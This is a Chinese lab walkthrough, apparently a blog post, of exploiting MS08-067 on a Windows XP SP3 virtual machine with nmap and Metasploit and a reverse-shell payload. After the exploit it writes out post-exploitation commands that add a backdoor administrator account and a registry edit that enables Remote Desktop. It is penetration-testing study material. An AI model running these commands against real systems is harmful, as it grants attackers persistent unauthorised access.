#windowsxpsp3系统MS08-067漏洞测试

#windowsxpsp3系统MS08-067漏洞测试

漏洞描述
MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求,则该漏洞可能允许远程执行代码,在Windows 2000、Windows server 2003系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。
Windows 2000、WindowsXP、Windows server 2003、Windows Vista、Windows server 2008、Windows7 beta。
实验环境(虚拟机搭建)
目标主机:winxpsp3英文版:192.168.28.133
攻击主机:kaililinux:192.168.28.134

攻击过程

先用nmap扫描内部192.168.28.0/24位的网段查看是否有xp系统的主机存活
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

进入metasploit框架
Msfconsole

搜索漏洞
Search ms08-067选择一个攻击模块

查看配置信息并设置
在这里插入图片描述

设置要攻击的目标主机ip
在这里插入图片描述

设置自己的ip地址,用于目标机器反弹shell
在这里插入图片描述

设置payload 用于反弹shell,这里是windows的

在这里插入图片描述

开始攻击
Expolit/run

在这里插入图片描述

一些命令

在这里插入图片描述

后渗透利用
Getuid
在这里插入图片描述

Shell

在这里插入图片描述

net user ouyang 123456 /add
在这里插入图片描述

net localgroup administrators ouyang /add
在这里插入图片描述

创建用户完毕后,打开3389远程桌面连接端口
echo reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat

在这里插入图片描述

查看机器是否打开了3389
在这里插入图片描述

远程桌面连接

在这里插入图片描述

链接成功
在这里插入图片描述

获取完信息之后删除用户
在这里插入图片描述

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽小丑

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值